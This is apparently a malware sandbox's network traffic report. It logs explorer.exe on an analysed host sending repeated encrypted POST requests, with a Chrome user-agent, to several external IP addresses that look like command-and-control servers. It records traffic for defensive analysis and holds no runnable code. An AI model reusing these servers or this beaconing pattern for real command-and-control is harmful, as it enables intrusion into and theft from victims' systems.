Ascii: CDI+Mak49/J/00u/rNOzn54Milg9Sa89XchPwxPgHw5WpQD2Nn2bWnE0Ho5KsimzK0TOGBkyy0xiZ2+L3O3qlNEppfYNE7sdF7zwbBp7sl35zKqjlhwfQaBAJp0gbKu16E1mSP6mjzvAWhL6vEmfz8RQIisEJJmp2Mwg7xQcu/lVomYpoOsnmIzzGlBubT38SQP9Lih/zMNbhQ7LZsvtgpi+h4EiwLBZHcsswfxgHlrY4D/gOlCGf6D0Wvmatkk
2024-07-27 05:31:54 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:54 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:54 UTC	685	IN	Data Raw: 51 49 51 2f 4a 42 43 57 2f 67 51 31 53 76 63 6a 67 46 36 58 6c 57 55 69 38 62 37 57 4a 51 36 71 58 36 6b 4f 45 42 37 41 6f 79 4b 36 76 75 48 41 67 55 41 68 72 35 5a 56 61 69 32 49 50 65 72 44 79 39 39 53 56 44 34 2b 45 66 34 43 34 2f 68 42 4a 39 42 36 31 6b 76 70 47 43 47 57 4c 4c 68 47 57 67 72 6f 6a 66 64 78 62 4d 63 74 73 39 51 31 36 49 5a 5a 42 44 62 63 53 4c 70 63 56 70 66 6a 6e 65 6b 66 6b 5a 38 34 75 4e 39 50 39 54 78 4e 56 45 43 33 32 4c 32 48 63 69 57 6d 74 75 65 61 49 35 42 6c 7a 36 47 44 7a 65 75 48 48 49 41 6b 65 65 33 46 6e 4d 4a 44 38 6f 59 4f 49 4b 62 6d 67 6a 38 78 6a 68 56 75 6e 6d 41 38 49 4c 33 71 43 4c 31 58 62 46 54 4d 74 6f 61 5a 38 7a 56 4f 53 6f 73 44 67 4b 66 49 63 78 70 78 69 59 43 79 57 2f 4f 43 65 6c 78 45 71 32 7a 42 59 46 55 Data Ascii: QIQ/JBCW/gQ1SvcjgF6XlWUi8b7WJQ6qX6kOEB7AoyK6vuHAgUAhr5ZVai2IPerDy99SVD4+Ef4C4/hBJ9B61kvpGCGWLLhGWgrojfdxbMcts9Q16IZZBDbcSLpcVpfjnekfkZ84uN9P9TxNVEC32L2HciWmtueaI5Blz6GDzeuHHIAkee3FnMJD8oYOIKbmgj8xjhVunmA8IL3qCL1XbFTMtoaZ8zVOSosDgKfIcxpxiYCyW/OCelxEq2zBYFU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	51886	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:55 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:55 UTC	1122	OUT	Data Raw: 41 42 6a 2f 7a 57 45 64 38 34 2b 5a 75 54 71 58 64 56 30 68 61 53 46 46 7a 43 30 44 73 74 73 6b 6d 38 6d 6f 67 71 43 6f 77 52 36 73 2f 61 50 4f 74 4b 73 4c 33 46 45 68 6e 48 71 72 56 57 42 46 65 49 49 39 6f 72 74 68 75 73 6a 6c 42 43 36 63 4e 6b 52 38 36 37 56 34 55 50 70 46 6f 48 4d 57 55 6d 67 59 58 58 76 52 68 4e 6b 4a 52 77 45 65 6d 36 67 52 55 79 30 78 71 48 4e 57 31 37 41 36 78 49 6d 50 6f 65 57 72 4a 43 4a 6a 79 33 38 69 4d 69 5a 6f 76 37 47 46 37 32 51 69 6f 30 63 32 51 50 42 6f 4e 76 4b 62 6c 35 64 4c 79 34 37 63 67 7a 6d 67 53 4a 31 50 39 52 42 37 69 76 37 36 5a 68 72 53 45 4f 6b 4a 6d 69 4a 55 2b 4f 31 6c 65 64 5a 39 43 58 6b 58 61 37 32 2b 43 6e 59 30 33 79 65 6f 6a 54 5a 55 58 64 42 73 74 36 4d 62 48 61 43 4b 70 6f 43 56 71 71 4d 37 51 31 71 Data Ascii: ABj/zWEd84+ZuTqXdV0haSFFzC0Dstskm8mogqCowR6s/aPOtKsL3FEhnHqrVWBFeII9orthusjlBC6cNkR867V4UPpFoHMWUmgYXXvRhNkJRwEem6gRUy0xqHNW17A6xImPoeWrJCJjy38iMiZov7GF72Qio0c2QPBoNvKbl5dLy47cgzmgSJ1P9RB7iv76ZhrSEOkJmiJU+O1ledZ9CXkXa72+CnY03yeojTZUXdBst6MbHaCKpoCVqqM7Q1q
2024-07-27 05:31:56 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:56 UTC	685	IN	Data Raw: 4f 56 46 5a 62 6e 46 74 64 6a 72 71 70 55 43 4a 4c 36 67 52 66 56 64 2b 49 43 42 30 70 36 7a 4e 31 52 2f 79 7a 4d 5a 53 57 59 51 50 68 51 59 4e 4f 39 34 51 5a 31 32 4c 6e 69 2b 55 4e 61 4f 31 4a 61 56 56 59 5a 76 35 59 46 41 75 70 6f 65 37 52 55 38 52 72 6f 74 4c 6e 73 65 57 74 33 45 58 70 49 49 2b 32 63 52 43 58 67 79 78 6a 53 5a 37 47 54 48 6e 6e 47 2f 48 79 2b 49 63 39 47 4f 6e 37 59 42 69 63 71 33 51 52 76 35 41 6a 4d 6c 37 6b 66 44 4a 52 6d 64 6c 57 38 4a 6d 41 7a 55 39 38 34 55 30 54 68 70 77 4c 42 62 78 51 37 38 76 32 42 31 4d 58 38 54 35 50 33 66 41 66 46 6b 58 2f 72 52 58 6f 75 74 65 67 70 52 36 77 45 71 42 46 38 4a 64 2b 2b 46 63 59 6d 45 31 6e 48 2f 74 76 47 4b 35 66 41 44 73 4b 30 63 51 56 47 46 4b 53 6f 59 78 31 55 4b 34 61 7a 77 46 70 39 39 Data Ascii: OVFZbnFtdjrqpUCJL6gRfVd+ICB0p6zN1R/yzMZSWYQPhQYNO94QZ12Lni+UNaO1JaVVYZv5YFAupoe7RU8RrotLnseWt3EXpII+2cRCXgyxjSZ7GTHnnG/Hy+Ic9GOn7YBicq3QRv5AjMl7kfDJRmdlW8JmAzU984U0ThpwLBbxQ78v2B1MX8T5P3fAfFkX/rRXoutegpR6wEqBF8Jd++FcYmE1nH/tvGK5fADsK0cQVGFKSoYx1UK4azwFp99

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	51887	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:57 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:57 UTC	1122	OUT	Data Raw: 4a 4f 30 76 51 56 42 42 56 63 61 2f 2b 4d 74 37 32 74 38 4f 5a 71 73 34 61 2f 6a 4e 79 5a 34 67 56 79 77 34 64 4b 5a 46 58 36 6d 41 56 74 32 7a 5a 52 50 5a 73 62 32 78 61 37 78 37 78 6e 41 4c 68 4c 62 4d 31 32 36 63 4b 43 78 2b 76 75 6f 32 69 71 52 30 35 2b 4e 7a 59 2b 6c 6f 56 39 66 45 4a 2b 46 79 67 5a 54 45 63 70 6d 79 34 55 76 2f 67 50 67 55 4e 6a 7a 6a 64 75 6e 69 4a 30 6d 6c 45 33 63 6a 57 64 47 75 4b 62 41 5a 71 4d 63 62 30 4b 72 30 67 38 56 6c 43 4a 35 67 59 50 6e 44 4b 4f 5a 55 58 61 37 7a 6c 69 70 6e 2b 70 56 57 6c 49 4c 54 4b 49 71 58 69 32 2f 33 31 37 65 77 71 58 63 5a 6a 36 6c 63 66 66 67 6b 34 69 76 36 53 57 68 70 56 7a 64 75 65 34 43 69 45 71 6e 45 77 2f 62 74 70 64 65 35 4d 5a 61 4a 35 4d 77 54 34 57 35 7a 66 66 72 43 78 6a 36 52 33 74 4e Data Ascii: JO0vQVBBVca/+Mt72t8OZqs4a/jNyZ4gVyw4dKZFX6mAVt2zZRPZsb2xa7x7xnALhLbM126cKCx+vuo2iqR05+NzY+loV9fEJ+FygZTEcpmy4Uv/gPgUNjzjduniJ0mlE3cjWdGuKbAZqMcb0Kr0g8VlCJ5gYPnDKOZUXa7zlipn+pVWlILTKIqXi2/317ewqXcZj6lcffgk4iv6SWhpVzdue4CiEqnEw/btpde5MZaJ5MwT4W5zffrCxj6R3tN
2024-07-27 05:31:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:58 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:58 UTC	685	IN	Data Raw: 6f 59 61 2b 73 52 63 44 75 41 75 48 72 79 58 77 77 2b 39 33 79 66 4d 71 72 68 39 64 30 31 67 53 35 55 73 67 54 48 54 71 45 57 50 34 77 5a 31 64 58 55 68 61 6e 4a 34 6f 6a 4a 55 52 35 65 45 78 74 54 62 59 48 50 38 6d 75 5a 35 72 45 56 52 4e 66 42 71 44 6f 65 76 4f 38 63 6c 4b 6b 5a 61 64 46 37 34 51 51 6d 34 68 59 62 69 6b 6f 76 68 56 75 43 66 58 54 32 4c 4c 62 43 37 64 64 58 64 48 47 53 42 70 51 79 47 35 65 2b 34 4f 52 2b 61 51 44 5a 43 78 46 4f 79 35 43 66 62 45 70 39 6b 2f 56 76 77 61 73 30 55 48 79 62 66 76 58 68 7a 55 34 56 46 55 70 31 52 4d 57 55 55 67 45 66 73 6b 7a 4c 36 48 76 78 79 42 52 4e 37 30 5a 63 4b 44 58 4a 30 6b 38 2f 45 4c 56 74 30 55 68 50 48 59 4f 5a 4c 78 50 71 57 6b 41 4a 44 70 38 75 59 55 50 73 65 4e 30 59 41 2f 75 6f 47 57 6f 6f 62 Data Ascii: oYa+sRcDuAuHryXww+93yfMqrh9d01gS5UsgTHTqEWP4wZ1dXUhanJ4ojJUR5eExtTbYHP8muZ5rEVRNfBqDoevO8clKkZadF74QQm4hYbikovhVuCfXT2LLbC7ddXdHGSBpQyG5e+4OR+aQDZCxFOy5CfbEp9k/Vvwas0UHybfvXhzU4VFUp1RMWUUgEfskzL6HvxyBRN70ZcKDXJ0k8/ELVt0UhPHYOZLxPqWkAJDp8uYUPseN0YA/uoGWoob

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	51888	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:59 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:59 UTC	1122	OUT	Data Raw: 49 7a 39 31 73 42 72 44 51 63 34 5a 4e 4a 4c 59 7a 77 49 49 75 5a 50 44 38 33 72 74 54 58 2f 37 45 77 36 4d 68 4a 4a 51 6d 2b 50 74 4a 4a 45 33 47 4c 71 38 6d 48 70 49 41 6e 71 4f 6d 44 39 54 6c 31 56 41 2b 38 6a 35 35 6a 39 76 59 58 55 41 6d 37 4b 4f 69 64 30 39 45 4c 6a 72 61 45 35 45 4a 67 38 46 6f 2b 72 62 6c 48 66 6e 53 70 4d 54 71 32 4d 52 52 32 6b 36 44 6a 52 41 69 68 71 4e 4a 73 41 55 67 37 2b 30 57 38 51 4b 66 34 4d 32 6a 62 70 41 2b 75 6c 49 63 45 69 34 52 6e 43 6a 69 38 5a 7a 33 4f 73 33 68 50 50 6b 51 58 74 34 33 46 74 58 6c 42 41 32 5a 78 46 4b 78 54 68 4b 54 32 43 48 53 6a 4a 7a 4c 51 4c 78 38 72 52 33 4e 2b 30 35 46 4f 4d 59 32 77 6c 67 4c 6d 6f 39 6e 72 58 6b 55 66 79 44 4a 34 32 38 6d 61 4c 65 67 59 55 65 37 66 5a 78 56 58 61 6a 4d 43 30 Data Ascii: Iz91sBrDQc4ZNJLYzwIIuZPD83rtTX/7Ew6MhJJQm+PtJJE3GLq8mHpIAnqOmD9Tl1VA+8j55j9vYXUAm7KOid09ELjraE5EJg8Fo+rblHfnSpMTq2MRR2k6DjRAihqNJsAUg7+0W8QKf4M2jbpA+ulIcEi4RnCji8Zz3Os3hPPkQXt43FtXlBA2ZxFKxThKT2CHSjJzLQLx8rR3N+05FOMY2wlgLmo9nrXkUfyDJ428maLegYUe7fZxVXajMC0
2024-07-27 05:32:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:00 UTC	685	IN	Data Raw: 48 4c 55 66 34 4c 64 74 65 65 61 68 61 63 34 67 39 54 4b 6c 51 6b 62 55 6e 4a 62 6b 6a 78 42 50 73 4d 71 30 46 52 4a 37 74 4a 6f 6c 2f 31 72 49 4e 6a 77 70 6a 77 69 4a 52 49 36 77 65 44 77 4d 74 74 46 47 4a 45 48 78 39 56 57 70 4c 35 62 43 50 38 64 53 30 4e 44 77 61 5a 31 58 4e 56 68 44 62 50 79 73 53 71 71 76 7a 68 70 6b 74 4a 66 75 45 41 79 49 76 78 72 70 54 72 31 48 39 51 47 6f 4d 6c 6c 69 2b 2b 4c 63 51 33 70 4d 4e 38 2b 6a 43 44 6c 46 36 35 49 31 37 4e 62 46 2f 48 73 30 47 31 67 34 6a 63 52 66 73 49 74 65 4f 41 32 70 45 49 51 76 5a 58 49 6c 4d 37 30 51 4c 76 68 78 52 66 34 79 30 4d 53 44 74 35 49 44 61 65 30 68 53 35 54 6c 71 70 2f 37 4c 76 32 42 59 49 6f 58 76 4e 52 2b 6c 38 69 2b 2f 5a 57 48 53 61 31 32 44 4d 55 76 46 6e 38 56 44 46 38 73 44 74 2f Data Ascii: HLUf4Ldteeahac4g9TKlQkbUnJbkjxBPsMq0FRJ7tJol/1rINjwpjwiJRI6weDwMttFGJEHx9VWpL5bCP8dS0NDwaZ1XNVhDbPysSqqvzhpktJfuEAyIvxrpTr1H9QGoMlli++LcQ3pMN8+jCDlF65I17NbF/Hs0G1g4jcRfsIteOA2pEIQvZXIlM70QLvhxRf4y0MSDt5IDae0hS5Tlqp/7Lv2BYIoXvNR+l8i+/ZWHSa12DMUvFn8VDF8sDt/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	51889	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:01 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:01 UTC	1122	OUT	Data Raw: 64 30 65 79 73 39 52 69 33 31 39 35 39 4b 72 32 50 57 6d 71 52 7a 49 6e 35 58 79 4d 44 77 42 73 61 65 4b 44 33 57 76 57 74 30 38 51 4e 64 63 63 2b 38 4d 79 71 63 74 55 32 57 59 48 74 56 42 43 48 49 49 62 58 38 56 65 63 49 30 57 6d 64 51 57 31 69 68 45 72 68 34 50 78 55 53 75 4c 63 58 64 32 49 75 75 5a 4e 66 69 6c 67 58 54 56 2f 72 78 56 4e 43 75 70 71 79 35 57 69 64 6c 34 75 73 6a 49 79 72 33 6e 55 54 59 72 49 4a 54 48 6a 39 4e 61 35 30 76 37 53 61 79 6e 70 46 61 62 61 4c 48 61 36 69 64 4d 63 6b 69 42 56 34 63 69 34 65 53 77 68 58 6b 30 6f 68 7a 6a 76 47 34 47 68 4e 68 49 4e 65 6c 42 6a 46 4b 30 62 2f 56 6a 48 71 66 44 49 55 71 6b 38 6f 70 62 39 49 43 57 77 44 4a 78 42 64 32 73 43 33 64 66 4c 55 44 4c 44 77 78 64 65 63 32 46 57 44 66 42 78 70 6b 78 59 31 Data Ascii: d0eys9Ri31959Kr2PWmqRzIn5XyMDwBsaeKD3WvWt08QNdcc+8MyqctU2WYHtVBCHIIbX8VecI0WmdQW1ihErh4PxUSuLcXd2IuuZNfilgXTV/rxVNCupqy5Widl4usjIyr3nUTYrIJTHj9Na50v7SaynpFabaLHa6idMckiBV4ci4eSwhXk0ohzjvG4GhNhINelBjFK0b/VjHqfDIUqk8opb9ICWwDJxBd2sC3dfLUDLDwxdec2FWDfBxpkxY1
2024-07-27 05:32:02 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:02 UTC	685	IN	Data Raw: 4a 56 68 7a 37 70 6b 54 6f 6b 6d 7a 4b 46 76 50 4a 57 64 70 79 79 6b 79 6e 67 64 59 65 32 47 47 4d 71 65 4d 69 68 30 54 57 43 51 54 43 63 70 6b 44 2b 68 59 44 48 78 76 37 39 49 69 39 69 73 6d 2f 32 6f 45 4a 50 6e 6f 77 78 41 59 6f 78 50 4c 49 67 45 5a 33 37 4c 4a 42 6f 4b 75 74 76 52 69 78 72 67 56 59 6e 33 65 7a 33 4e 4c 58 77 4c 6d 52 31 2f 6a 72 37 59 53 32 57 73 33 70 69 61 76 43 53 33 77 30 4a 58 2b 4b 6f 50 44 4a 50 42 4c 71 4d 73 56 45 46 33 34 31 64 46 4a 46 74 53 6f 37 36 63 68 68 4b 2f 38 6e 30 32 31 74 70 31 4c 58 6c 2f 39 46 43 4a 35 75 44 74 34 6f 53 39 38 74 57 4a 41 4f 76 49 54 47 41 73 6f 52 43 78 4b 4c 2b 75 71 6f 51 67 47 61 76 7a 47 39 42 6d 41 30 7a 59 4d 37 61 41 65 74 2b 61 47 70 34 49 57 53 67 47 6b 62 4c 45 70 77 34 52 43 35 6b 32 Data Ascii: JVhz7pkTokmzKFvPJWdpyykyngdYe2GGMqeMih0TWCQTCcpkD+hYDHxv79Ii9ism/2oEJPnowxAYoxPLIgEZ37LJBoKutvRixrgVYn3ez3NLXwLmR1/jr7YS2Ws3piavCS3w0JX+KoPDJPBLqMsVEF341dFJFtSo76chhK/8n021tp1LXl/9FCJ5uDt4oS98tWJAOvITGAsoRCxKL+uqoQgGavzG9BmA0zYM7aAet+aGp4IWSgGkbLEpw4RC5k2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	51890	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:03 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:03 UTC	1267	OUT	Data Raw: 42 41 50 73 61 51 4a 6f 4e 55 6e 4f 6d 32 4c 70 67 50 58 75 6e 72 6c 6b 63 74 4d 7a 64 4b 79 39 6f 30 50 57 4e 53 62 71 6d 32 4e 51 68 4a 41 6d 37 52 2b 70 59 75 44 4a 6f 4f 76 32 4b 2f 4e 51 67 72 6a 6d 58 49 46 68 34 37 44 56 6d 68 6d 6a 38 69 64 36 35 4e 58 67 58 69 4f 76 52 2f 78 61 6d 45 4d 51 43 42 54 70 6d 78 64 58 4b 34 4f 38 51 49 58 74 4f 33 39 32 72 30 73 58 73 2b 4e 43 54 4c 42 51 54 44 4e 77 33 2b 73 67 54 79 6b 72 44 31 32 54 73 74 39 2f 73 4d 50 62 52 31 58 43 4a 49 36 48 63 68 57 74 4e 43 70 54 6a 72 36 4d 6e 6e 7a 46 38 38 50 39 61 45 67 67 73 55 6b 6c 70 53 33 35 4b 45 6b 57 6c 41 52 37 47 70 38 2b 2f 50 79 6a 52 4c 62 39 6d 4e 67 63 39 6e 38 75 34 2f 77 4e 42 2b 68 43 47 65 4f 4a 35 38 73 77 35 71 61 75 43 78 53 46 34 36 6b 36 52 63 34 Data Ascii: BAPsaQJoNUnOm2LpgPXunrlkctMzdKy9o0PWNSbqm2NQhJAm7R+pYuDJoOv2K/NQgrjmXIFh47DVmhmj8id65NXgXiOvR/xamEMQCBTpmxdXK4O8QIXtO392r0sXs+NCTLBQTDNw3+sgTykrD12Tst9/sMPbR1XCJI6HchWtNCpTjr6MnnzF88P9aEggsUklpS35KEkWlAR7Gp8+/PyjRLb9mNgc9n8u4/wNB+hCGeOJ58sw5qauCxSF46k6Rc4
2024-07-27 05:32:04 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:04 UTC	685	IN	Data Raw: 6d 58 43 63 72 6d 2f 70 4c 30 70 6c 48 33 43 44 30 72 6a 69 63 66 79 30 54 50 32 68 79 6d 77 7a 63 4e 6c 6c 78 4c 66 58 6e 72 32 75 34 73 6d 43 35 37 4c 63 62 67 33 6c 64 75 4a 78 53 55 72 56 69 72 31 67 70 54 5a 79 36 65 75 37 72 73 4b 74 71 39 36 46 41 61 2b 30 6e 4b 54 50 34 56 2b 63 47 5a 6a 75 31 71 73 4f 71 6f 6b 34 6a 33 55 6e 63 31 36 57 45 4a 78 45 37 32 76 58 33 4e 36 6e 66 56 4f 30 62 59 55 70 57 75 43 2f 50 72 4e 53 62 44 74 35 6f 77 64 4c 54 51 44 47 6b 6d 67 4d 55 73 6a 6a 4d 70 70 46 34 66 6a 2b 43 62 4f 77 39 50 46 66 4d 34 43 71 30 71 2f 6c 33 39 62 56 52 53 4b 2b 52 52 2f 50 6b 70 32 43 73 33 75 78 79 38 66 45 6a 55 75 47 67 72 52 42 46 55 77 73 45 57 42 72 59 65 45 69 31 77 54 77 65 2b 4c 38 34 37 4b 57 67 39 35 67 62 71 4a 78 78 45 4c Data Ascii: mXCcrm/pL0plH3CD0rjicfy0TP2hymwzcNllxLfXnr2u4smC57Lcbg3lduJxSUrVir1gpTZy6eu7rsKtq96FAa+0nKTP4V+cGZju1qsOqok4j3Unc16WEJxE72vX3N6nfVO0bYUpWuC/PrNSbDt5owdLTQDGkmgMUsjjMppF4fj+CbOw9PFfM4Cq0q/l39bVRSK+RR/Pkp2Cs3uxy8fEjUuGgrRBFUwsEWBrYeEi1wTwe+L847KWg95gbqJxxEL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	51891	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:04 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:04 UTC	1122	OUT	Data Raw: 49 6c 64 7a 6d 30 59 61 4a 48 7a 4c 36 6e 75 68 6e 74 6a 76 51 53 49 6e 79 42 73 41 59 69 48 6f 52 6b 46 71 55 58 47 59 79 70 78 4b 52 4e 39 73 38 67 64 66 34 36 79 6c 69 2b 4a 32 36 66 46 31 50 72 75 47 57 6b 42 63 59 43 31 6a 4f 66 67 6d 34 54 64 33 4c 54 2f 73 4a 6a 4b 5a 4e 35 35 72 74 4d 77 50 51 39 49 56 79 56 4a 56 48 2b 65 51 62 48 45 52 37 6f 49 57 68 48 56 31 51 38 67 2f 44 73 52 64 74 76 2b 64 6d 66 4e 7a 31 73 43 35 47 77 31 45 77 53 76 71 38 31 4f 49 35 71 65 4f 6b 4d 36 62 75 37 49 50 4b 65 54 2f 62 33 66 54 7a 71 41 6b 4c 30 57 67 73 52 69 49 47 57 51 30 68 75 75 54 47 4a 77 75 68 34 33 35 46 38 6d 43 65 5a 5a 37 4f 34 71 41 54 6a 74 2f 77 49 54 6d 42 65 50 33 77 62 58 6a 76 46 56 62 39 54 75 7a 52 4c 66 69 67 48 4b 72 55 52 37 61 65 46 64 Data Ascii: Ildzm0YaJHzL6nuhntjvQSInyBsAYiHoRkFqUXGYypxKRN9s8gdf46yli+J26fF1PruGWkBcYC1jOfgm4Td3LT/sJjKZN55rtMwPQ9IVyVJVH+eQbHER7oIWhHV1Q8g/DsRdtv+dmfNz1sC5Gw1EwSvq81OI5qeOkM6bu7IPKeT/b3fTzqAkL0WgsRiIGWQ0huuTGJwuh435F8mCeZZ7O4qATjt/wITmBeP3wbXjvFVb9TuzRLfigHKrUR7aeFd
2024-07-27 05:32:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:06 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:06 UTC	685	IN	Data Raw: 4c 75 74 4b 49 65 66 57 5a 4c 31 78 57 74 53 6e 69 55 69 4b 45 62 41 42 31 44 62 74 31 44 65 77 6c 6c 58 59 63 64 75 62 6c 41 65 4d 46 75 56 50 54 30 42 67 44 6e 74 64 59 48 67 58 45 6d 75 6d 72 62 33 6e 41 6d 49 72 4f 49 34 30 2b 2f 4e 75 4b 74 57 67 53 51 34 41 38 43 47 6a 37 6c 45 56 46 65 6b 49 49 69 45 76 4c 6a 76 31 71 6a 43 4e 39 4f 55 2b 2f 71 72 31 39 71 48 56 4a 5a 70 53 38 34 59 43 58 71 5a 56 4a 48 49 37 6b 54 37 77 6f 65 44 32 75 42 52 42 39 6c 55 6a 70 42 44 54 54 75 68 74 44 51 4c 66 4f 4b 62 69 4b 2b 35 65 79 2f 49 50 7a 73 4e 56 79 64 30 72 65 57 69 54 52 66 6e 51 49 52 54 78 45 79 66 39 68 58 52 6a 6d 71 78 63 6f 49 56 57 78 6d 66 42 78 73 57 6a 39 51 63 75 31 34 4e 59 50 6c 37 2b 77 57 4f 39 48 6f 2f 69 6b 74 4c 4f 58 78 54 4d 75 6b 58 Data Ascii: LutKIefWZL1xWtSniUiKEbAB1Dbt1DewllXYcdublAeMFuVPT0BgDntdYHgXEmumrb3nAmIrOI40+/NuKtWgSQ4A8CGj7lEVFekIIiEvLjv1qjCN9OU+/qr19qHVJZpS84YCXqZVJHI7kT7woeD2uBRB9lUjpBDTTuhtDQLfOKbiK+5ey/IPzsNVyd0reWiTRfnQIRTxEyf9hXRjmqxcoIVWxmfBxsWj9Qcu14NYPl7+wWO9Ho/iktLOXxTMukX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	51892	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:07 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:07 UTC	1267	OUT	Data Raw: 6a 50 5a 51 52 49 6a 42 2b 4e 57 49 51 62 6a 6f 39 32 45 57 44 43 4f 74 59 4c 76 69 34 46 56 5a 4f 45 72 55 2b 44 78 37 36 68 6b 4e 6f 33 4f 31 72 55 4f 6a 51 37 78 78 39 79 69 49 50 49 36 37 53 76 62 75 33 47 6a 72 2b 36 51 48 32 64 61 4b 2f 78 31 58 79 78 37 32 6b 55 47 7a 37 59 52 2f 79 55 38 76 5a 6d 37 4d 58 6e 30 30 38 64 5a 51 6a 78 6a 47 68 38 75 48 52 59 77 67 72 62 68 54 43 51 4a 75 68 68 53 44 79 41 64 4f 4c 4a 5a 48 58 31 34 6d 4c 72 78 47 6c 36 52 6d 48 4e 44 66 45 35 65 47 78 59 58 50 5a 58 2b 37 47 68 55 52 68 49 6b 57 6e 65 42 63 59 30 62 34 69 32 78 44 77 47 75 38 57 42 6a 70 45 34 52 35 66 59 45 69 77 67 67 70 42 52 56 6b 66 47 67 6e 4a 36 54 44 62 6a 71 78 64 77 4c 79 4d 46 74 31 75 50 50 54 70 4d 6e 43 30 5a 6f 54 33 32 5a 61 33 72 44 Data Ascii: jPZQRIjB+NWIQbjo92EWDCOtYLvi4FVZOErU+Dx76hkNo3O1rUOjQ7xx9yiIPI67Svbu3Gjr+6QH2daK/x1Xyx72kUGz7YR/yU8vZm7MXn008dZQjxjGh8uHRYwgrbhTCQJuhhSDyAdOLJZHX14mLrxGl6RmHNDfE5eGxYXPZX+7GhURhIkWneBcY0b4i2xDwGu8WBjpE4R5fYEiwggpBRVkfGgnJ6TDbjqxdwLyMFt1uPPTpMnC0ZoT32Za3rD
2024-07-27 05:32:08 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close
